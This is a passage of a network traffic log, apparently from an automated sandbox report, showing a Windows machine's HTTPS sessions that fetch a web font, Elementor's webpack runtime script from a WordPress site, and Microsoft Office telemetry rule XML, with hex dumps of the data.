                                                                                                                                                                                                                              Data Ascii: wOF2cPc6$ `< @m %V')=<E%~WS`00-q=^/?znDo,pFB8Tr5nQ>t:QSteV)`Igb""ZI2},
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 59 ab b0 99 15 7b b7 8d 0c 8c c6 6e f8 e7 ab ab fe 16 de 00 8c 91 0a ad ea 11 50 88 e9 cc 52 d4 64 e6 58 1f c0 ea 7b e7 1d 79 f6 e0 92 84 e7 6b ed 3f cb bf 0f 32 84 ee a5 83 a7 6a 55 fc ff bb 42 a7 3c a2 dd 7b fb b6 18 0a 4c 08 b8 7b 96 66 5e e8 fd 1f 20 94 20 97 40 ed 0b 82 03 17 17 a7 62 65 a4 5e 1d e9 e2 e2 65 2a 42 b8 c0 ff f7 4b 4b ee 98 71 8a e7 da d0 dc c5 0d c9 be a7 76 f8 2d 09 74 cf 78 53 d0 e6 3c 49 e3 24 39 6b c6 29 b2 98 b1 7a 66 1d e4 fc 9d 9b ad ca 68 e0 16 9f 5d e4 90 10 36 00 d4 d0 00 23 fb ff ef 57 ea 7f ef 53 dd 6b 74 55 7d ab 57 ad d5 da 22 45 49 d5 b4 bd 57 e5 ae b9 d6 36 f6 d9 e7 18 d1 a4 71 b2 31 22 33 61 44 66 c2 88 c8 84 11 89 c4 de fb 9c 88 3c e7 44 64 32 22 13 a4 32 01 90 37 13 e4 d5 03 48 49 03 00 a9 5b 04 a5 ab 6a 22 33 61 24
                                                                                                                                                                                                                              Data Ascii: Y{nPRdX{yk?2jUB<{L{f^ @be^e*BKKqv-txS<I$9k)zfh]6#WSktU}W"EIW6q1"3aDf<Dd2"27HI[j"3a$
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6d 4d e3 a6 fd 46 ac 5b c8 a7 2c 6a 44 ef a1 e4 41 09 6e 51 ce d8 ac e4 b8 7e 2a 70 06 45 7c 9b a0 3c af 23 d3 1c 5f e5 68 ac 53 df b5 6a 1c cd 3e 5f 37 4e 5e 37 bd 63 99 b1 ec a2 f4 ff c3 66 75 35 c4 3d 9a af d6 df cf 8e fc c7 b3 34 5f 9a af 23 1f 95 85 be d4 be ca fc 7e 92 42 8f 1f d9 d7 34 97 d4 3e 3d 1f c2 38 a9 cb d6 cf e5 ec 39 81 59 37 57 8d e7 59 9e 1d 7b ca 72 56 0c 09 9c 7b 33 f9 6d f3 9b fa e2 94 6c e5 67 e5 39 db 99 84 e2 33 7f 7f f2 bc bb 13 71 0e f2 42 4f 36 58 3a d8 5d 4a 69 83 af f4 0e 23 74 d5 d0 79 67 31 6a c7 39 97 ea dd ac b3 f4 2d c1 ae 24 87 06 3b df 06 da 04 66 dc 9b 9e 68 46 6f d9 e6 3d 1b 39 97 ac a7 11 bc fb 90 bd 74 74 37 28 ec 2c bc 06 55 a6 78 1b d4 bd 90 f7 d3 c9 f9 de c5 43 7a ee 35 c1 93 bc fb fd 99 f9 44 de a3 fb 9e ad db
                                                                                                                                                                                                                              Data Ascii: mMF[,jDAnQ~*pE|<#_hSj>_7N^7cfu5=4_#~B4>=89Y7WY{rV{3mlg93qBO6X:]Ji#tyg1j9-$;fhFo=9tt7(,UxCz5D
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 54 4d a1 d9 b5 80 16 d6 ca 5a 45 6b 68 2d 6d ae dd 74 a0 0e d2 21 3a 54 c7 ea 54 9d a6 d3 75 86 ce d6 39 3a 5f 97 e8 32 5d a1 eb 74 93 1e d0 83 7a 58 8f e8 51 3d a6 c7 f5 84 9e d2 33 7a 56 6f e8 5d e5 c3 e7 e6 bd f1 cd 17 f3 dd fc 32 c6 88 09 33 ff 6c 0c 1b df a6 b7 19 6d 6e 5b d4 96 b6 ed 6c 07 db d9 76 b3 53 ec 54 3b cb 2e b6 3b ec 25 7b c5 de b0 77 ec 23 fb c4 7e b0 41 d6 b7 bf 6c 84 fd 6b ff 53 4c 4a 4c 59 29 3b e5 a0 e2 54 92 ca 52 79 aa 44 55 a8 1a d5 a0 5a 54 8f 1a 52 63 6a 46 ad a9 03 75 a2 ae d4 93 06 d0 50 1a 4e 63 68 02 4d a2 a9 34 8b e6 d1 42 5a 4e ab 68 23 6d a1 03 74 8c ce d2 45 ba 4a d7 e9 26 3d a4 67 f4 8e 3e 51 28 7d e6 38 9c 8f f3 73 61 2e c2 25 b8 24 57 e6 2a bc 84 37 f0 56 de c5 47 f8 38 9f e6 0b 7c 83 ef f1 43 7e ca af f8 2d bf e7 4f
                                                                                                                                                                                                                              Data Ascii: TMZEkh-mt!:TTu9:_2]tzXQ=3zVo]23lmn[lvST;.;%{w#~AlkSLJLY);TRyDUZTRcjFuPNchM4BZNh#mtEJ&=g>Q(}8sa.%$W*7VG8|C~-O
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 5c 09 00 5c 06 70 29 c0 c5 00 c0 d9 00 67 72 06 a7 71 34 c0 91 00 47 00 1c be f4 7f f6 1f 02 70 00 fb 03 ec c1 6e ec ca ce ec c8 76 6c c3 56 6c c6 c6 6c c0 8a ac 80 87 d8 99 80 d8 49 fc 97 ff f4 ef fe 0d 00 7c d3 17 7d d8 ab bd ca cb bd c4 0b bd c0 53 3d d9 e3 3d c2 7d 00 f7 74 67 b7 72 4d d7 00 5c da a5 5c c2 c5 5d d4 45 5c d8 85 5c d0 f9 9c c7 b9 9d d3 59 9d c9 19 9d c1 69 9d c6 a9 9c d2 c9 01 27 76 22 27 74 3c c7 75 1c c7 76 4c 40 ff e8 77 fd d0 37 7d d5 17 7d d6 5b bd d4 73 3d d5 63 40 67 75 02 d0 71 40 c7 00 1d 05 74 44 87 75 48 07 b5 5f fb b4 57 7b b4 5b bb b4 53 3b b4 45 9b b4 51 1b b4 5e 6b b5 5a 2b b4 4c 33 35 4d 53 34 52 c3 35 48 7d d5 47 bd d4 5d 5d d4 4e ad d5 5c 4d d5 58 0d 55 57 75 54 5b 35 55 55 95 54 51 e5 55 4e 65 55 52 25 54 5c c5 54 44
                                                                                                                                                                                                                              Data Ascii: \\p)grq4GpnvlVllI|}S==}tgrM\\]E\\Yi'v"'t<uvL@w7}}[s=c@guq@tDuH_W{[S;EQ^kZ+L35MS4R5H}G]]N\MXUWuT[5UUTQUNeUR%T\TD
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 55 80 e3 5d 00 27 b8 02 38 d1 75 02 4e 72 9d 81 93 5d 17 e0 14 d7 15 38 d5 75 03 4e 73 dd 81 d3 5d 0f e0 8c 5d 7a 02 0f 42 17 02 0f 43 17 03 8f 43 5f 01 4f 42 e3 80 67 e0 f5 80 57 a0 77 80 37 a1 f1 c0 af b0 eb 81 b5 f0 39 50 6a 0a fb 13 4a ed a0 6d a1 d4 1e da 0e 4a 83 a1 49 50 1a 02 4d 86 d2 43 d0 bd 50 7a 0c ba 08 4a 8f 43 97 42 e9 09 e8 37 28 3d 05 5d 00 a5 97 90 66 40 e9 35 64 fd a0 f4 36 74 09 94 ab e0 75 a1 7c 1d ec 27 28 5f 0f fb 05 ca 37 c0 7e 86 f2 8d b0 5f a1 7c 13 7c 3b 28 df 0c df 1e ca b7 c2 77 85 f2 1b 50 0f 28 bf 09 bb 0b ca 1f 41 fd a1 aa 09 ec 4f a8 ea 00 5f 0a b9 43 53 20 4f d0 54 c8 db c2 05 79 27 68 57 c8 3b c3 be 80 bc 0b ec 4b c8 bb 22 35 85 fc 76 d8 93 90 7f 0b fb 1c f2 f9 b0 4f 20 5f 00 fb 00 f2 c5 b0 4f 21 5f 02 7b 1f f2 e5 f0 51
                                                                                                                                                                                                                              Data Ascii: U]'8uNr]8uNs]]zBCC_OBgWw79PjJmJIPMCPzJCB7(=]f@5d6tu|'(_7~_||;(wP(AO_CS OTy'hW;K"5vO _O!_{Q
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: ec f8 15 f5 27 76 22 76 23 7d 42 ec 41 1c 46 aa 89 23 18 21 05 71 34 71 1c a9 10 c7 83 7c 06 71 02 f2 99 c4 89 48 bf 12 27 49 de e4 27 fb 13 a6 df 88 53 89 d3 48 bf 13 67 10 67 92 fe 24 ce 26 ce 25 fd 4d 9c 07 f2 24 c4 f9 48 37 11 17 6c 64 fa 8f b8 84 b8 8c f4 3f 71 05 71 e5 1b 16 9f 29 ae f2 37 90 17 26 ae 26 6e 23 f7 23 ee 20 ee 22 8f 22 9e 20 5e 23 8f 25 de 20 de 24 4f 4d bc 47 7c 46 9e 96 a8 58 4e 9e 95 e8 11 7d 63 a1 3a 1a d1 ef 3c a2 75 e9 0b 62 39 e9 17 e2 4b e2 87 3e dc 7a 22 88 5f c8 0b 10 bf 8a ce 22 c4 6f c8 27 12 bf 8f 98 af 23 fe 20 fe 23 2f 4a 41 19 38 8e ad cb 20 47 e8 6c 42 19 4c 19 4a 5e 85 32 8c e5 e4 b5 28 c3 29 23 c6 a8 eb 29 a3 28 a3 c9 6b 52 c6 88 ce 8e 94 71 1e 4a fa 8e 32 5e 44 fa 9e 32 21 65 52 f2 da 94 c9 90 74 05 65 f2 88 bc 01
                                                                                                                                                                                                                              Data Ascii: 'v"v#}BAF#!q4q|qH'I'SHgg$&%M$H7ld?qq)7&&n## "" ^#% $OMG|FXN}c:<ub9K>z"_"o'# #/JA8 GlBLJ^2()#)(kRqJ2^D2!eRte
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 1f 4e fb 98 f6 09 fd 11 b4 cf 90 fe 28 f8 b0 f3 bd c4 89 74 7e 92 38 89 ce 6f 12 27 d3 f9 33 22 4e a1 33 96 ce 38 e2 54 b2 0b 89 d3 c9 90 38 83 1c 24 71 26 39 54 e2 2c 72 12 89 b3 c9 a9 24 ce 21 a7 e9 63 9c 4b 4e 4f ce 40 9c 47 ce 42 ce 4a 5c 40 ce 49 ce 4d 5c 44 2e 44 44 5c 4a 2e 46 2e 4e 5c 46 2e 83 c4 15 e4 f2 12 57 92 2b 49 5c 45 ae 2a 71 35 b9 96 c4 35 e4 3a 11 71 2d b9 1e b9 01 71 1d b9 31 11 71 23 b9 05 b9 25 71 13 b9 2d 25 e3 16 72 7b 72 47 e2 56 72 17 72 37 e2 0e 72 0f 24 ee 26 f7 92 b8 87 dc 5f e2 5e f2 c0 92 71 1f 79 30 79 08 71 3f 79 18 79 38 f1 20 79 14 25 e3 61 f2 18 f2 78 e2 11 f2 24 f2 14 e2 09 f2 42 4a c6 d3 e4 c5 e4 65 c4 33 e4 d5 e4 35 c4 0b e4 4d 48 bc 44 de 22 f1 32 79 47 44 bc 42 3e 48 3e 44 bc 4a 3e 86 c4 eb e4 93 12 6f 90 4f 47 c4
                                                                                                                                                                                                                              Data Ascii: N(t~8o'3"N38T8$q&9T,r$!cKNO@GBJ\@IM\D.DD\J.F.N\F.W+I\E*q55:q-q1q#%q-%r{rGVrr7r$&_^qy0yq?yy8 y%ax$BJe35MHD"2yGDB>H>DJ>oOG
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 8a 87 88 7e 47 f1 ef 05 f8 b5 b7 92 bb 29 01 fa 1a 25 49 ec 6c 94 1c b1 03 51 2a 45 74 25 4a 65 88 ae 42 a9 2c 31 11 a5 72 c4 3c 83 52 79 a2 e3 50 aa 4c f4 07 4a 55 88 2e 45 a9 2a d1 ff 28 55 23 a6 2f 4a d5 89 79 01 a5 1a 44 37 a0 54 93 98 6a 28 d5 22 e6 62 94 9a 13 7d 8a 52 4b 62 2a a0 d4 8a b8 0f 51 6a 47 dc 29 28 75 23 66 0a 4a dd 3d 84 91 12 77 15 4a a3 89 bb 1b a5 31 c4 de 8c d2 58 e2 6e 45 69 1c 71 77 a1 34 9e b8 a7 50 9a 40 dc 47 28 4d 25 3a 0f a5 b5 96 7f 59 da a0 95 8f 2c 6d 96 b8 1f 50 da 4e cc c7 28 ed 24 ee 27 94 f6 12 fd 8b d2 7e e2 e7 a1 74 04 31 ed 51 3a ce ca 6b 96 4e 90 d8 91 28 9d 48 dc 22 94 4e 22 e6 15 94 ce 26 7e 38 4a e7 10 5b 0a a5 ab ac 9e 67 e9 6a 89 9d 87 d2 75 44 37 a2 74 3d 31 cf a3 74 83 d5 c9 2c dd 2e f1 6b 50 ba 8b 18 83 d2
                                                                                                                                                                                                                              Data Ascii: ~G)%IlQ*Et%JeB,1r<RyPLJU.E*(U#/JyD7Tj("b}RKb*QjG)(u#fJ=wJ1XnEiqw4P@G(M%:Y,mPN($'~t1Q:kN(H"N"&~8J[gjuD7t=1t,.kP
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 14 37 d3 c6 59 fd 2f 08 90 34 57 32 e6 d8 8e cb 02 1e 65 59 68 5a 4d 8c 2d cb 6f 1a 4b 35 1a a9 e2 9c 38 49 d2 4c 35 a5 02 66 94 8a 4d f0 ac c0 17 9c 10 ec 11 ce 42 e9 b8 44 32 70 3c 8f 89 95 56 67 2d 49 7c cf da 10 94 52 2a 72 8b 10 ea 32 c6 99 ed 38 c4 75 2d 37 08 e2 d0 71 89 0c c0 f5 08 17 2b ad ce 6a 92 f8 9e 95 0b 4a 11 b2 10 5a 7e 07 26 70 0f ca 50 17 ed 23 04 d5 c8 98 61 59 e4 5d 02 c6 cd 52 ad 06 07 35 90 a2 2c 88 4b 94 56 75 55 c3 84 a1 2f a5 d4 e7 dc 5f cc fe 3d 1c c6 df 81 76 a7 d3 86 4f 1d 08 a6 0c bd ec 73 ee 53 ba 98 fd 1c 0a 63 ba 99 c4 71 b2 f9 a9 63 89 5e b3 46 b0 5c 2c e7 70 2b 4c d1 7d f3 3a af 4d 4d 78 b4 4b 48 8e 37 e5 6a 4e 4c 3d d8 a9 aa 6b 53 9a 7c 3b 47 6b 13 3d 13 94 5e 0d 38 23 c4 b2 d8 0b 5e 18 58 96 eb 31 1e 5c cd a4 c1 e7 b1
                                                                                                                                                                                                                              Data Ascii: 7Y/4W2eYhZM-oK58IL5fMBD2p<Vg-I|R*r28u-7q+jJZ~&pP#aY]R5,KVuU/_=vOsScqc^F\,p+L}:MMxKH7jNL=kS|;Gk=^8#^X1\


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              98192.168.2.649832141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC676OUTGET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-1385"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e27fdf28e8-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC877INData Raw: 31 33 38 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 5f 2c 74 2c 61 2c 69 3d 7b 7d 2c 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 65 29 7b 76 61 72 20 72 3d 6e 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 5f 3d 6e 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 69 5b 65 5d 2e 63 61 6c 6c 28 5f 2e 65 78 70 6f 72 74 73 2c 5f 2c 5f 2e 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 2c 5f 2e 65 78 70 6f 72 74
                                                                                                                                                                                                                              Data Ascii: 1385/*! elementor - v3.24.0 - 09-10-2024 */(()=>{"use strict";var e,r,_,t,a,i={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return i[e].call(_.exports,_,_.exports,__webpack_require__),_.export
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 74 79 70 65 6f 66 20 65 2e 74 68 65 6e 29 72 65 74 75 72 6e 20 65 7d 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 72 28 61 29 3b 76 61 72 20 69 3d 7b 7d 3b 72 3d 72 7c 7c 5b 6e 75 6c 6c 2c 5f 28 7b 7d 29 2c 5f 28 5b 5d 29 2c 5f 28 5f 29 5d 3b 66 6f 72 28 76 61 72 20 6e 3d 32 26 74 26 26 65 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 21 7e 72 2e 69 6e 64 65 78 4f 66 28 6e 29 3b 6e 3d 5f 28 6e 29 29 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 28 6e 29 2e 66 6f 72 45 61 63 68 28 28 72 3d 3e 69 5b 72 5d 3d 28 29 3d 3e 65 5b 72 5d 29 29 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 3d 28 29 3d 3e 65 2c 5f 5f 77
                                                                                                                                                                                                                              Data Ascii: typeof e.then)return e}var a=Object.create(null);__webpack_require__.r(a);var i={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof n&&!~r.indexOf(n);n=_(n))Object.getOwnPropertyNames(n).forEach((r=>i[r]=()=>e[r]));return i.default=()=>e,__w
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 54 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e 20 74 68 69 73 7c 7c 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 7d 28 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 3d 28 65 2c 72 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 7b 7d 2c 61 3d 22 65 6c 65 6d 65 6e 74 6f 72 3a 22 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6c 3d 28 65 2c 72 2c 5f 2c 69
                                                                                                                                                                                                                              Data Ascii: eof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t={},a="elementor:",__webpack_require__.l=(e,r,_,i
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 72 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 28 65 3d 72 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 2c 21 65 29 29 7b 76 61 72 20 5f 3d 72 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 5f 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 74 3d 5f 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 2d 31 26 26 21 65 3b 29 65 3d 5f 5b 74 2d 2d 5d 2e 73 72 63 7d 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 75 74 6f 6d 61 74 69 63 20 70 75 62 6c 69 63 50 61 74 68 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 22 29 3b 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 23 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2e
                                                                                                                                                                                                                              Data Ascii: r.currentScript&&(e=r.currentScript.src),!e)){var _=r.getElementsByTagName("script");if(_.length)for(var t=_.length-1;t>-1&&!e;)e=_[t--].src}if(!e)throw new Error("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC21INData Raw: 68 2e 62 69 6e 64 28 72 29 29 7d 29 28 29 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                                                              Data Ascii: h.bind(r))})()})();
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              99192.168.2.64983013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                              x-ms-request-id: 71d2c1fc-001e-00a2-01de-21d4d5000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180410Z-r1755647c66x46wg1q56tyyk6800000007xg000000001rm9
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              100192.168.2.64983313.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                              x-ms-request-id: 629c9caa-001e-0079-2150-2312e8000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180410Z-17fbfdc98bb94gkbvedtsa5ef4000000063000000000b267
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              101192.168.2.64983113.107.253.72443
